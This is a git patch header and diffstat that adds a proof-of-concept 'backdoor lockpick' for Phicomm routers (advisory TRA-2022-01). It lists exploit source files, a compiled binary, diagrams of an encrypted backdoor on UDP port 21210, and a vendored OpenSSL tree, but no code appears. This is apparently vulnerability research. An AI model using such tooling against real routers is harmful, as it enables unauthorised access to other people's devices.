From 1e75433e0bab1f49752fc1e695885b13f6a8cb99 Mon Sep 17 00:00:00 2001
From: Lucca Fraser <lucca.fraser@gmail.com>
Date: Fri, 8 Apr 2022 08:29:32 -0300
Subject: [PATCH 1/2] adding tra-2022-01 poc, backdoor lockpick for phicomm

---
 .../backdoor-lockpick_tra-2022-01/.gitignore  |     1 +
 .../backdoor-lockpick_tra-2022-01/Makefile    |    40 +
 .../backdoor-lockpick_tra-2022-01/README.md   |     3 +
 .../backdoor-lockpick_tra-2022-01/helper.c    |   807 ++
 ...s_Encrypted_Backdoor_on_UDP_Port_21210.png |   Bin 0 -> 278849 bytes
 ...s_Encrypted_Backdoor_on_UDP_Port_21210.svg |     1 +
 ...s_Encrypted_Backdoor_on_UDP_Port_21210.png |   Bin 0 -> 535389 bytes
 ...s_Encrypted_Backdoor_on_UDP_Port_21210.svg |     1 +
 .../lib/libcrypto.a                           |   Bin 0 -> 3086838 bytes
 .../lib/libtelnet.a                           |   Bin 0 -> 22520 bytes
 .../backdoor-lockpick_tra-2022-01/lockpick    |   Bin 0 -> 1002352 bytes
 .../backdoor-lockpick_tra-2022-01/lockpick.c  |   831 ++
 .../mk-libcrypto.sh                           |    15 +
 .../openssl-1.0.2/ACKNOWLEDGMENTS             |    30 +
 .../openssl-1.0.2/CHANGES                     | 10879 ++++++++++++++++
 .../openssl-1.0.2/CHANGES.SSLeay              |   968 ++
 .../openssl-1.0.2/Configure                   |  2248 ++++
 .../openssl-1.0.2/FAQ                         |  1053 ++
 .../openssl-1.0.2/GitConfigure                |     8 +
 .../openssl-1.0.2/GitMake                     |     5 +
 .../openssl-1.0.2/INSTALL                     |   360 +
 .../openssl-1.0.2/INSTALL.DJGPP               |    47 +
 .../openssl-1.0.2/INSTALL.MacOS               |    72 +
 .../openssl-1.0.2/INSTALL.NW                  |   454 +
 .../openssl-1.0.2/INSTALL.OS2                 |    31 +
 .../openssl-1.0.2/INSTALL.VMS                 |   293 +
 .../openssl-1.0.2/INSTALL.W32                 |   325 +
 .../openssl-1.0.2/INSTALL.W64                 |    66 +
 .../openssl-1.0.2/INSTALL.WCE                 |    95 +
 .../openssl-1.0.2/LICENSE                     |   127 +
 .../openssl-1.0.2/MacOS/GUSI_Init.cpp         |    62 +
 .../MacOS/GetHTTPS.src/CPStringUtils.cpp      |  2753 ++++
 .../MacOS/GetHTTPS.src/CPStringUtils.hpp      |   104 +
 .../MacOS/GetHTTPS.src/ErrorHandling.cpp      |   170 +
 .../MacOS/GetHTTPS.src/ErrorHandling.hpp      |   147 +
 .../MacOS/GetHTTPS.src/GetHTTPS.cpp           |   209 +
 .../MacOS/GetHTTPS.src/MacSocket.cpp          |  1607 +++
 .../MacOS/GetHTTPS.src/MacSocket.h            |   104 +
 .../openssl-1.0.2/MacOS/OpenSSL.mcp.hqx       |  4940 +++++++
 .../openssl-1.0.2/MacOS/Randomizer.cpp        |   476 +
 .../openssl-1.0.2/MacOS/Randomizer.h          |    42 +
 .../openssl-1.0.2/MacOS/TODO                  |    18 +
 .../openssl-1.0.2/MacOS/_MWERKS_GUSI_prefix.h |     9 +
 .../openssl-1.0.2/MacOS/_MWERKS_prefix.h      |     9 +
 .../openssl-1.0.2/MacOS/buildinf.h            |     5 +
 .../openssl-1.0.2/MacOS/mklinks.as.hqx        |   820 ++
 .../openssl-1.0.2/MacOS/opensslconf.h         |   126 +
 .../openssl-1.0.2/Makefile                    |   688 +
 .../openssl-1.0.2/Makefile.bak                |   688 +
 .../openssl-1.0.2/Makefile.org                |   686 +
 .../openssl-1.0.2/Makefile.shared             |   655 +
 .../openssl-1.0.2/NEWS                        |   770 ++
 .../openssl-1.0.2/Netware/build.bat           |   235 +
 .../openssl-1.0.2/Netware/cpy_tests.bat       |   113 +
 .../openssl-1.0.2/Netware/do_tests.pl         |   624 +
 .../openssl-1.0.2/Netware/globals.txt         |   254 +
 .../openssl-1.0.2/Netware/readme.txt          |    19 +
 .../openssl-1.0.2/Netware/set_env.bat         |   112 +
 .../openssl-1.0.2/PROBLEMS                    |   213 +
 .../openssl-1.0.2/README                      |   192 +
 .../openssl-1.0.2/README.ASN1                 |   187 +
 .../openssl-1.0.2/README.ENGINE               |   289 +
 .../openssl-1.0.2/VMS/TODO                    |    18 +
 .../openssl-1.0.2/VMS/VMSify-conf.pl          |    34 +
 .../openssl-1.0.2/VMS/WISHLIST.TXT            |     4 +
 .../openssl-1.0.2/VMS/install-vms.com         |    67 +
 .../openssl-1.0.2/VMS/mkshared.com            |   476 +
 .../openssl-1.0.2/VMS/multinet_shr.opt        |     1 +
 .../openssl-1.0.2/VMS/openssl_startup.com     |   108 +
 .../openssl-1.0.2/VMS/openssl_undo.com        |    20 +
 .../openssl-1.0.2/VMS/openssl_utils.com       |    46 +
 .../openssl-1.0.2/VMS/socketshr_shr.opt       |     1 +
 .../openssl-1.0.2/VMS/tcpip_shr_decc.opt      |     1 +
 .../openssl-1.0.2/VMS/test-includes.com       |    28 +
 .../openssl-1.0.2/VMS/ucx_shr_decc.opt        |     1 +
 .../openssl-1.0.2/VMS/ucx_shr_decc_log.opt    |     1 +
 .../openssl-1.0.2/VMS/ucx_shr_vaxc.opt        |     1 +
 .../openssl-1.0.2/apps/CA.com                 |   236 +
 .../openssl-1.0.2/apps/CA.pl                  |   189 +
 .../openssl-1.0.2/apps/CA.pl.bak              |   189 +
 .../openssl-1.0.2/apps/CA.pl.in               |   189 +
 .../openssl-1.0.2/apps/CA.sh                  |   198 +
 .../openssl-1.0.2/apps/Makefile               |   903 ++
 .../openssl-1.0.2/apps/Makefile.bak           |   903 ++
 .../openssl-1.0.2/apps/Makefile.save          |   903 ++
 .../openssl-1.0.2/apps/app_rand.c             |   220 +
 .../openssl-1.0.2/apps/app_rand.o             |   Bin 0 -> 3936 bytes
 .../openssl-1.0.2/apps/apps.c                 |  3210 +++++
 .../openssl-1.0.2/apps/apps.h                 |   387 +
 .../openssl-1.0.2/apps/apps.o                 |   Bin 0 -> 60488 bytes
 .../openssl-1.0.2/apps/asn1pars.c             |   430 +
 .../openssl-1.0.2/apps/asn1pars.o             |   Bin 0 -> 13168 bytes
 .../openssl-1.0.2/apps/ca-cert.srl            |     1 +
 .../openssl-1.0.2/apps/ca-key.pem             |    15 +
 .../openssl-1.0.2/apps/ca-req.pem             |    11 +
 .../openssl-1.0.2/apps/ca.c                   |  2903 +++++
 .../openssl-1.0.2/apps/ca.o                   |   Bin 0 -> 78160 bytes
 .../openssl-1.0.2/apps/cert.pem               |    11 +
 .../openssl-1.0.2/apps/ciphers.c              |   239 +
 .../openssl-1.0.2/apps/ciphers.o              |   Bin 0 -> 6136 bytes
 .../openssl-1.0.2/apps/client.pem             |    52 +
 .../openssl-1.0.2/apps/cms.c                  |  1351 ++
 .../openssl-1.0.2/apps/cms.o                  |   Bin 0 -> 47256 bytes
 .../openssl-1.0.2/apps/crl.c                  |   442 +
 .../openssl-1.0.2/apps/crl.o                  |   Bin 0 -> 14536 bytes
 .../openssl-1.0.2/apps/crl2p7.c               |   334 +
 .../openssl-1.0.2/apps/crl2p7.o               |   Bin 0 -> 8928 bytes
 .../openssl-1.0.2/apps/demoCA/cacert.pem      |    14 +
 .../openssl-1.0.2/apps/demoCA/index.txt       |    39 +
 .../apps/demoCA/private/cakey.pem             |    24 +
 .../openssl-1.0.2/apps/demoCA/serial          |     1 +
 .../apps/demoSRP/srp_verifier.txt             |     6 +
 .../apps/demoSRP/srp_verifier.txt.attr        |     1 +
 .../openssl-1.0.2/apps/dgst.c                 |   609 +
 .../openssl-1.0.2/apps/dgst.o                 |   Bin 0 -> 19888 bytes
 .../openssl-1.0.2/apps/dh.c                   |   337 +
 .../openssl-1.0.2/apps/dh.o                   |   Bin 0 -> 10728 bytes
 .../openssl-1.0.2/apps/dh1024.pem             |    10 +
 .../openssl-1.0.2/apps/dh2048.pem             |    12 +
 .../openssl-1.0.2/apps/dh4096.pem             |    18 +
 .../openssl-1.0.2/apps/dh512.pem              |     9 +
 .../openssl-1.0.2/apps/dhparam.c              |   546 +
 .../openssl-1.0.2/apps/dhparam.o              |   Bin 0 -> 16104 bytes
 .../openssl-1.0.2/apps/dsa-ca.pem             |    40 +
 .../openssl-1.0.2/apps/dsa-pca.pem            |    46 +
 .../openssl-1.0.2/apps/dsa.c                  |   374 +
 .../openssl-1.0.2/apps/dsa.o                  |   Bin 0 -> 11624 bytes
 .../openssl-1.0.2/apps/dsa1024.pem            |     9 +
 .../openssl-1.0.2/apps/dsa512.pem             |     6 +
 .../openssl-1.0.2/apps/dsap.pem               |     6 +
 .../openssl-1.0.2/apps/dsaparam.c             |   469 +
 .../openssl-1.0.2/apps/dsaparam.o             |   Bin 0 -> 13912 bytes
 .../openssl-1.0.2/apps/ec.c                   |   365 +
 .../openssl-1.0.2/apps/ec.o                   |   Bin 0 -> 1072 bytes
 .../openssl-1.0.2/apps/ecparam.c              |   662 +
 .../openssl-1.0.2/apps/ecparam.o              |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/apps/enc.c                  |   710 +
 .../openssl-1.0.2/apps/enc.o                  |   Bin 0 -> 21000 bytes
 .../openssl-1.0.2/apps/engine.c               |   517 +
 .../openssl-1.0.2/apps/engine.o               |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/apps/errstr.c               |   121 +
 .../openssl-1.0.2/apps/errstr.o               |   Bin 0 -> 3640 bytes
 .../openssl-1.0.2/apps/gendh.c                |   248 +
 .../openssl-1.0.2/apps/gendh.o                |   Bin 0 -> 6424 bytes
 .../openssl-1.0.2/apps/gendsa.c               |   287 +
 .../openssl-1.0.2/apps/gendsa.o               |   Bin 0 -> 9544 bytes
 .../openssl-1.0.2/apps/genpkey.c              |   405 +
 .../openssl-1.0.2/apps/genpkey.o              |   Bin 0 -> 12184 bytes
 .../openssl-1.0.2/apps/genrsa.c               |   350 +
 .../openssl-1.0.2/apps/genrsa.o               |   Bin 0 -> 10760 bytes
 .../openssl-1.0.2/apps/install-apps.com       |   107 +
 .../openssl-1.0.2/apps/makeapps.com           |  1184 ++
 .../openssl-1.0.2/apps/md4.c                  |     1 +
 .../openssl-1.0.2/apps/nseq.c                 |   170 +
 .../openssl-1.0.2/apps/nseq.o                 |   Bin 0 -> 5688 bytes
 .../openssl-1.0.2/apps/ocsp.c                 |  1364 ++
 .../openssl-1.0.2/apps/ocsp.o                 |   Bin 0 -> 43896 bytes
 .../openssl-1.0.2/apps/oid.cnf                |     6 +
 .../openssl-1.0.2/apps/openssl-vms.cnf        |   350 +
 .../openssl-1.0.2/apps/openssl.c              |   696 +
 .../openssl-1.0.2/apps/openssl.cnf            |   350 +
 .../openssl-1.0.2/apps/openssl.o              |   Bin 0 -> 25808 bytes
 .../openssl-1.0.2/apps/passwd.c               |   494 +
 .../openssl-1.0.2/apps/passwd.o               |   Bin 0 -> 13640 bytes
 .../openssl-1.0.2/apps/pca-cert.srl           |     1 +
 .../openssl-1.0.2/apps/pca-key.pem            |    15 +
 .../openssl-1.0.2/apps/pca-req.pem            |    11 +
 .../openssl-1.0.2/apps/pkcs12.c               |  1068 ++
 .../openssl-1.0.2/apps/pkcs12.o               |   Bin 0 -> 33960 bytes
 .../openssl-1.0.2/apps/pkcs7.c                |   308 +
 .../openssl-1.0.2/apps/pkcs7.o                |   Bin 0 -> 8088 bytes
 .../openssl-1.0.2/apps/pkcs8.c                |   402 +
 .../openssl-1.0.2/apps/pkcs8.o                |   Bin 0 -> 13768 bytes
 .../openssl-1.0.2/apps/pkey.c                 |   251 +
 .../openssl-1.0.2/apps/pkey.o                 |   Bin 0 -> 7624 bytes
 .../openssl-1.0.2/apps/pkeyparam.c            |   185 +
 .../openssl-1.0.2/apps/pkeyparam.o            |   Bin 0 -> 5248 bytes
 .../openssl-1.0.2/apps/pkeyutl.c              |   523 +
 .../openssl-1.0.2/apps/pkeyutl.o              |   Bin 0 -> 15416 bytes
 .../openssl-1.0.2/apps/prime.c                |   151 +
 .../openssl-1.0.2/apps/prime.o                |   Bin 0 -> 5336 bytes
 .../openssl-1.0.2/apps/privkey.pem            |    18 +
 .../openssl-1.0.2/apps/progs.h                |   366 +
 .../openssl-1.0.2/apps/progs.pl               |   104 +
 .../openssl-1.0.2/apps/rand.c                 |   229 +
 .../openssl-1.0.2/apps/rand.o                 |   Bin 0 -> 5680 bytes
 .../openssl-1.0.2/apps/req.c                  |  1732 +++
 .../openssl-1.0.2/apps/req.o                  |   Bin 0 -> 49824 bytes
 .../openssl-1.0.2/apps/req.pem                |    11 +
 .../openssl-1.0.2/apps/rsa.c                  |   439 +
 .../openssl-1.0.2/apps/rsa.o                  |   Bin 0 -> 13672 bytes
 .../openssl-1.0.2/apps/rsa8192.pem            |   101 +
 .../openssl-1.0.2/apps/rsautl.c               |   370 +
 .../openssl-1.0.2/apps/rsautl.o               |   Bin 0 -> 11640 bytes
 .../openssl-1.0.2/apps/s1024key.pem           |    15 +
 .../openssl-1.0.2/apps/s1024req.pem           |    11 +
 .../openssl-1.0.2/apps/s512-key.pem           |     9 +
 .../openssl-1.0.2/apps/s512-req.pem           |     8 +
 .../openssl-1.0.2/apps/s_apps.h               |   211 +
 .../openssl-1.0.2/apps/s_cb.c                 |  1646 +++
 .../openssl-1.0.2/apps/s_cb.o                 |   Bin 0 -> 42632 bytes
 .../openssl-1.0.2/apps/s_client.c             |  2324 ++++
 .../openssl-1.0.2/apps/s_client.o             |   Bin 0 -> 59824 bytes
 .../openssl-1.0.2/apps/s_server.c             |  3408 +++++
 .../openssl-1.0.2/apps/s_server.o             |   Bin 0 -> 89216 bytes
 .../openssl-1.0.2/apps/s_socket.c             |   613 +
 .../openssl-1.0.2/apps/s_socket.o             |   Bin 0 -> 7992 bytes
 .../openssl-1.0.2/apps/s_time.c               |   636 +
 .../openssl-1.0.2/apps/s_time.o               |   Bin 0 -> 15680 bytes
 .../openssl-1.0.2/apps/server.pem             |    52 +
 .../openssl-1.0.2/apps/server.srl             |     1 +
 .../openssl-1.0.2/apps/server2.pem            |    52 +
 .../openssl-1.0.2/apps/sess_id.c              |   300 +
 .../openssl-1.0.2/apps/sess_id.o              |   Bin 0 -> 7832 bytes
 .../openssl-1.0.2/apps/set/set-g-ca.pem       |    21 +
 .../openssl-1.0.2/apps/set/set-m-ca.pem       |    21 +
 .../openssl-1.0.2/apps/set/set_b_ca.pem       |    23 +
 .../openssl-1.0.2/apps/set/set_c_ca.pem       |    21 +
 .../openssl-1.0.2/apps/set/set_d_ct.pem       |    21 +
 .../openssl-1.0.2/apps/set/set_root.pem       |    21 +
 .../openssl-1.0.2/apps/smime.c                |   776 ++
 .../openssl-1.0.2/apps/smime.o                |   Bin 0 -> 29288 bytes
 .../openssl-1.0.2/apps/speed.c                |  2865 ++++
 .../openssl-1.0.2/apps/speed.o                |   Bin 0 -> 58552 bytes
 .../openssl-1.0.2/apps/spkac.c                |   312 +
 .../openssl-1.0.2/apps/spkac.o                |   Bin 0 -> 10024 bytes
 .../openssl-1.0.2/apps/srp.c                  |   760 ++
 .../openssl-1.0.2/apps/srp.o                  |   Bin 0 -> 1072 bytes
 .../openssl-1.0.2/apps/testCA.pem             |     8 +
 .../openssl-1.0.2/apps/testdsa.h              |   233 +
 .../openssl-1.0.2/apps/testrsa.h              |   518 +
 .../openssl-1.0.2/apps/timeouts.h             |    67 +
 .../openssl-1.0.2/apps/ts.c                   |  1119 ++
 .../openssl-1.0.2/apps/ts.o                   |   Bin 0 -> 24192 bytes
 .../openssl-1.0.2/apps/tsget                  |   196 +
 .../openssl-1.0.2/apps/verify.c               |   352 +
 .../openssl-1.0.2/apps/verify.o               |   Bin 0 -> 10352 bytes
 .../openssl-1.0.2/apps/version.c              |   214 +
 .../openssl-1.0.2/apps/version.o              |   Bin 0 -> 4680 bytes
 .../openssl-1.0.2/apps/vms_decc_init.c        |   172 +
 .../openssl-1.0.2/apps/winrand.c              |   146 +
 .../openssl-1.0.2/apps/x509.c                 |  1275 ++
 .../openssl-1.0.2/apps/x509.o                 |   Bin 0 -> 43584 bytes
 .../openssl-1.0.2/bugs/MS                     |     7 +
 .../openssl-1.0.2/bugs/SSLv3                  |    49 +
 .../openssl-1.0.2/bugs/alpha.c                |    92 +
 .../openssl-1.0.2/bugs/dggccbug.c             |    45 +
 .../openssl-1.0.2/bugs/sgiccbug.c             |    60 +
 .../openssl-1.0.2/bugs/sslref.dif             |    26 +
 .../openssl-1.0.2/bugs/stream.c               |   132 +
 .../openssl-1.0.2/bugs/ultrixcc.c             |    44 +
 .../openssl-1.0.2/certs/README.RootCerts      |     4 +
 .../openssl-1.0.2/certs/demo/3f77a2b5.0       |     1 +
 .../openssl-1.0.2/certs/demo/ca-cert.pem      |    33 +
 .../openssl-1.0.2/certs/demo/cbdbd8bc.0       |     1 +
 .../openssl-1.0.2/certs/demo/de4fa23b.0       |     1 +
 .../openssl-1.0.2/certs/demo/dsa-ca.pem       |    43 +
 .../openssl-1.0.2/certs/demo/dsa-pca.pem      |    49 +
 .../openssl-1.0.2/certs/demo/e83ef475.0       |     1 +
 .../openssl-1.0.2/certs/demo/pca-cert.pem     |    33 +
 .../openssl-1.0.2/certs/expired/ICE.crl       |     9 +
 .../openssl-1.0.2/config                      |   986 ++
 .../openssl-1.0.2/crypto/LPdir_nyi.c          |    47 +
 .../openssl-1.0.2/crypto/LPdir_unix.c         |   126 +
 .../openssl-1.0.2/crypto/LPdir_vms.c          |   195 +
 .../openssl-1.0.2/crypto/LPdir_win.c          |   170 +
 .../openssl-1.0.2/crypto/LPdir_win32.c        |    33 +
 .../openssl-1.0.2/crypto/LPdir_wince.c        |    36 +
 .../openssl-1.0.2/crypto/Makefile             |   216 +
 .../openssl-1.0.2/crypto/Makefile.bak         |   216 +
 .../openssl-1.0.2/crypto/Makefile.save        |   216 +
 .../openssl-1.0.2/crypto/aes/Makefile         |   169 +
 .../openssl-1.0.2/crypto/aes/Makefile.bak     |   169 +
 .../openssl-1.0.2/crypto/aes/Makefile.save    |   169 +
 .../openssl-1.0.2/crypto/aes/README           |     3 +
 .../openssl-1.0.2/crypto/aes/aes.h            |   149 +
 .../openssl-1.0.2/crypto/aes/aes_cbc.c        |    66 +
 .../openssl-1.0.2/crypto/aes/aes_cbc.o        |   Bin 0 -> 1768 bytes
 .../openssl-1.0.2/crypto/aes/aes_cfb.c        |    85 +
 .../openssl-1.0.2/crypto/aes/aes_cfb.o        |   Bin 0 -> 2080 bytes
 .../openssl-1.0.2/crypto/aes/aes_core.c       |  1363 ++
 .../openssl-1.0.2/crypto/aes/aes_core.o       |   Bin 0 -> 15008 bytes
 .../openssl-1.0.2/crypto/aes/aes_ctr.c        |    63 +
 .../openssl-1.0.2/crypto/aes/aes_ctr.o        |   Bin 0 -> 1640 bytes
 .../openssl-1.0.2/crypto/aes/aes_ecb.c        |    73 +
 .../openssl-1.0.2/crypto/aes/aes_ecb.o        |   Bin 0 -> 1616 bytes
 .../openssl-1.0.2/crypto/aes/aes_ige.c        |   323 +
 .../openssl-1.0.2/crypto/aes/aes_ige.o        |   Bin 0 -> 4416 bytes
 .../openssl-1.0.2/crypto/aes/aes_locl.h       |    89 +
 .../openssl-1.0.2/crypto/aes/aes_misc.c       |    86 +
 .../openssl-1.0.2/crypto/aes/aes_misc.o       |   Bin 0 -> 2152 bytes
 .../openssl-1.0.2/crypto/aes/aes_ofb.c        |    61 +
 .../openssl-1.0.2/crypto/aes/aes_ofb.o        |   Bin 0 -> 1640 bytes
 .../openssl-1.0.2/crypto/aes/aes_wrap.c       |    72 +
 .../openssl-1.0.2/crypto/aes/aes_wrap.o       |   Bin 0 -> 1848 bytes
 .../openssl-1.0.2/crypto/aes/aes_x86core.c    |  1072 ++
 .../openssl-1.0.2/crypto/aes/asm/aes-586.pl   |  2987 +++++
 .../openssl-1.0.2/crypto/aes/asm/aes-armv4.pl |  1217 ++
 .../openssl-1.0.2/crypto/aes/asm/aes-ia64.S   |  1123 ++
 .../openssl-1.0.2/crypto/aes/asm/aes-mips.pl  |  2122 +++
 .../crypto/aes/asm/aes-parisc.pl              |  1022 ++
 .../openssl-1.0.2/crypto/aes/asm/aes-ppc.pl   |  1452 +++
 .../openssl-1.0.2/crypto/aes/asm/aes-s390x.pl |  2237 ++++
 .../crypto/aes/asm/aes-sparcv9.pl             |  1182 ++
 .../crypto/aes/asm/aes-x86_64.pl              |  2813 ++++
 .../crypto/aes/asm/aesni-mb-x86_64.pl         |  1395 ++
 .../crypto/aes/asm/aesni-sha1-x86_64.pl       |  2057 +++
 .../crypto/aes/asm/aesni-sha256-x86_64.pl     |  1708 +++
 .../openssl-1.0.2/crypto/aes/asm/aesni-x86.pl |  2232 ++++
 .../crypto/aes/asm/aesni-x86_64.pl            |  3555 +++++
 .../openssl-1.0.2/crypto/aes/asm/aesp8-ppc.pl |  1942 +++
 .../crypto/aes/asm/aest4-sparcv9.pl           |   919 ++
 .../crypto/aes/asm/aesv8-armx.pl              |   962 ++
 .../crypto/aes/asm/bsaes-armv7.pl             |  2469 ++++
 .../crypto/aes/asm/bsaes-x86_64.pl            |  3102 +++++
 .../openssl-1.0.2/crypto/aes/asm/vpaes-ppc.pl |  1512 +++
 .../openssl-1.0.2/crypto/aes/asm/vpaes-x86.pl |   903 ++
 .../crypto/aes/asm/vpaes-x86_64.pl            |  1207 ++
 .../openssl-1.0.2/crypto/aes/lib              |     0
 .../openssl-1.0.2/crypto/alphacpuid.pl        |   126 +
 .../openssl-1.0.2/crypto/arm64cpuid.S         |    46 +
 .../openssl-1.0.2/crypto/arm_arch.h           |    78 +
 .../openssl-1.0.2/crypto/armcap.c             |   164 +
 .../openssl-1.0.2/crypto/armv4cpuid.S         |   209 +
 .../openssl-1.0.2/crypto/asn1/Makefile        |   876 ++
 .../openssl-1.0.2/crypto/asn1/Makefile.bak    |   876 ++
 .../openssl-1.0.2/crypto/asn1/Makefile.save   |   876 ++
 .../openssl-1.0.2/crypto/asn1/a_bitstr.c      |   262 +
 .../openssl-1.0.2/crypto/asn1/a_bitstr.o      |   Bin 0 -> 3720 bytes
 .../openssl-1.0.2/crypto/asn1/a_bool.c        |   111 +
 .../openssl-1.0.2/crypto/asn1/a_bool.o        |   Bin 0 -> 2280 bytes
 .../openssl-1.0.2/crypto/asn1/a_bytes.c       |   306 +
 .../openssl-1.0.2/crypto/asn1/a_bytes.o       |   Bin 0 -> 4784 bytes
 .../openssl-1.0.2/crypto/asn1/a_d2i_fp.c      |   268 +
 .../openssl-1.0.2/crypto/asn1/a_d2i_fp.o      |   Bin 0 -> 4376 bytes
 .../openssl-1.0.2/crypto/asn1/a_digest.c      |   111 +
 .../openssl-1.0.2/crypto/asn1/a_digest.o      |   Bin 0 -> 2600 bytes
 .../openssl-1.0.2/crypto/asn1/a_dup.c         |   117 +
 .../openssl-1.0.2/crypto/asn1/a_dup.o         |   Bin 0 -> 2568 bytes
 .../openssl-1.0.2/crypto/asn1/a_enum.c        |   181 +
 .../openssl-1.0.2/crypto/asn1/a_enum.o        |   Bin 0 -> 3440 bytes
 .../openssl-1.0.2/crypto/asn1/a_gentm.c       |   312 +
 .../openssl-1.0.2/crypto/asn1/a_gentm.o       |   Bin 0 -> 4568 bytes
 .../openssl-1.0.2/crypto/asn1/a_i2d_fp.c      |   157 +
 .../openssl-1.0.2/crypto/asn1/a_i2d_fp.o      |   Bin 0 -> 3568 bytes
 .../openssl-1.0.2/crypto/asn1/a_int.c         |   462 +
 .../openssl-1.0.2/crypto/asn1/a_int.o         |   Bin 0 -> 5576 bytes
 .../openssl-1.0.2/crypto/asn1/a_mbstr.c       |   423 +
 .../openssl-1.0.2/crypto/asn1/a_mbstr.o       |   Bin 0 -> 5248 bytes
 .../openssl-1.0.2/crypto/asn1/a_object.c      |   402 +
 .../openssl-1.0.2/crypto/asn1/a_object.o      |   Bin 0 -> 6664 bytes
 .../openssl-1.0.2/crypto/asn1/a_octet.c       |    78 +
 .../openssl-1.0.2/crypto/asn1/a_octet.o       |   Bin 0 -> 1880 bytes
 .../openssl-1.0.2/crypto/asn1/a_print.c       |   129 +
 .../openssl-1.0.2/crypto/asn1/a_print.o       |   Bin 0 -> 1880 bytes
 .../openssl-1.0.2/crypto/asn1/a_set.c         |   238 +
 .../openssl-1.0.2/crypto/asn1/a_set.o         |   Bin 0 -> 4560 bytes
 .../openssl-1.0.2/crypto/asn1/a_sign.c        |   331 +
 .../openssl-1.0.2/crypto/asn1/a_sign.o        |   Bin 0 -> 5720 bytes
 .../openssl-1.0.2/crypto/asn1/a_strex.c       |   649 +
 .../openssl-1.0.2/crypto/asn1/a_strex.o       |   Bin 0 -> 9368 bytes
 .../openssl-1.0.2/crypto/asn1/a_strnid.c      |   313 +
 .../openssl-1.0.2/crypto/asn1/a_strnid.o      |   Bin 0 -> 6112 bytes
 .../openssl-1.0.2/crypto/asn1/a_time.c        |   228 +
 .../openssl-1.0.2/crypto/asn1/a_time.o        |   Bin 0 -> 5600 bytes
 .../openssl-1.0.2/crypto/asn1/a_type.c        |   154 +
 .../openssl-1.0.2/crypto/asn1/a_type.o        |   Bin 0 -> 2328 bytes
 .../openssl-1.0.2/crypto/asn1/a_utctm.c       |   352 +
 .../openssl-1.0.2/crypto/asn1/a_utctm.o       |   Bin 0 -> 4984 bytes
 .../openssl-1.0.2/crypto/asn1/a_utf8.c        |   237 +
 .../openssl-1.0.2/crypto/asn1/a_utf8.o        |   Bin 0 -> 2776 bytes
 .../openssl-1.0.2/crypto/asn1/a_verify.c      |   231 +
 .../openssl-1.0.2/crypto/asn1/a_verify.o      |   Bin 0 -> 4224 bytes
 .../openssl-1.0.2/crypto/asn1/ameth_lib.c     |   466 +
 .../openssl-1.0.2/crypto/asn1/ameth_lib.o     |   Bin 0 -> 6888 bytes
 .../openssl-1.0.2/crypto/asn1/asn1.h          |  1418 ++
 .../openssl-1.0.2/crypto/asn1/asn1_err.c      |   354 +
 .../openssl-1.0.2/crypto/asn1/asn1_err.o      |   Bin 0 -> 1368 bytes
 .../openssl-1.0.2/crypto/asn1/asn1_gen.c      |   802 ++
 .../openssl-1.0.2/crypto/asn1/asn1_gen.o      |   Bin 0 -> 13064 bytes
 .../openssl-1.0.2/crypto/asn1/asn1_lib.c      |   476 +
 .../openssl-1.0.2/crypto/asn1/asn1_lib.o      |   Bin 0 -> 6928 bytes
 .../openssl-1.0.2/crypto/asn1/asn1_locl.h     |   135 +
 .../openssl-1.0.2/crypto/asn1/asn1_mac.h      |   579 +
 .../openssl-1.0.2/crypto/asn1/asn1_par.c      |   405 +
 .../openssl-1.0.2/crypto/asn1/asn1_par.o      |   Bin 0 -> 9464 bytes
 .../openssl-1.0.2/crypto/asn1/asn1t.h         |   973 ++
 .../openssl-1.0.2/crypto/asn1/asn_mime.c      |   973 ++
 .../openssl-1.0.2/crypto/asn1/asn_mime.o      |   Bin 0 -> 18568 bytes
 .../openssl-1.0.2/crypto/asn1/asn_moid.c      |   153 +
 .../openssl-1.0.2/crypto/asn1/asn_moid.o      |   Bin 0 -> 3016 bytes
 .../openssl-1.0.2/crypto/asn1/asn_pack.c      |   207 +
 .../openssl-1.0.2/crypto/asn1/asn_pack.o      |   Bin 0 -> 4240 bytes
 .../openssl-1.0.2/crypto/asn1/bio_asn1.c      |   482 +
 .../openssl-1.0.2/crypto/asn1/bio_asn1.o      |   Bin 0 -> 7200 bytes
 .../openssl-1.0.2/crypto/asn1/bio_ndef.c      |   242 +
 .../openssl-1.0.2/crypto/asn1/bio_ndef.o      |   Bin 0 -> 4024 bytes
 .../openssl-1.0.2/crypto/asn1/charmap.h       |    15 +
 .../openssl-1.0.2/crypto/asn1/charmap.pl      |    83 +
 .../openssl-1.0.2/crypto/asn1/d2i_pr.c        |   168 +
 .../openssl-1.0.2/crypto/asn1/d2i_pr.o        |   Bin 0 -> 3224 bytes
 .../openssl-1.0.2/crypto/asn1/d2i_pu.c        |   136 +
 .../openssl-1.0.2/crypto/asn1/d2i_pu.o        |   Bin 0 -> 2224 bytes
 .../openssl-1.0.2/crypto/asn1/evp_asn1.c      |   195 +
 .../openssl-1.0.2/crypto/asn1/evp_asn1.o      |   Bin 0 -> 4192 bytes
 .../openssl-1.0.2/crypto/asn1/f_enum.c        |   203 +
 .../openssl-1.0.2/crypto/asn1/f_enum.o        |   Bin 0 -> 3408 bytes
 .../openssl-1.0.2/crypto/asn1/f_int.c         |   215 +
 .../openssl-1.0.2/crypto/asn1/f_int.o         |   Bin 0 -> 3560 bytes
 .../openssl-1.0.2/crypto/asn1/f_string.c      |   209 +
 .../openssl-1.0.2/crypto/asn1/f_string.o      |   Bin 0 -> 3392 bytes
 .../openssl-1.0.2/crypto/asn1/i2d_pr.c        |    78 +
 .../openssl-1.0.2/crypto/asn1/i2d_pr.o        |   Bin 0 -> 1888 bytes
 .../openssl-1.0.2/crypto/asn1/i2d_pu.c        |    93 +
 .../openssl-1.0.2/crypto/asn1/i2d_pu.o        |   Bin 0 -> 1728 bytes
 .../openssl-1.0.2/crypto/asn1/lib             |     0
 .../openssl-1.0.2/crypto/asn1/n_pkey.c        |   345 +
 .../openssl-1.0.2/crypto/asn1/n_pkey.o        |   Bin 0 -> 9944 bytes
 .../openssl-1.0.2/crypto/asn1/nsseq.c         |    84 +
 .../openssl-1.0.2/crypto/asn1/nsseq.o         |   Bin 0 -> 3496 bytes
 .../openssl-1.0.2/crypto/asn1/p5_pbe.c        |   143 +
 .../openssl-1.0.2/crypto/asn1/p5_pbe.o        |   Bin 0 -> 4728 bytes
 .../openssl-1.0.2/crypto/asn1/p5_pbev2.c      |   280 +
 .../openssl-1.0.2/crypto/asn1/p5_pbev2.o      |   Bin 0 -> 7904 bytes
 .../openssl-1.0.2/crypto/asn1/p8_pkey.c       |   144 +
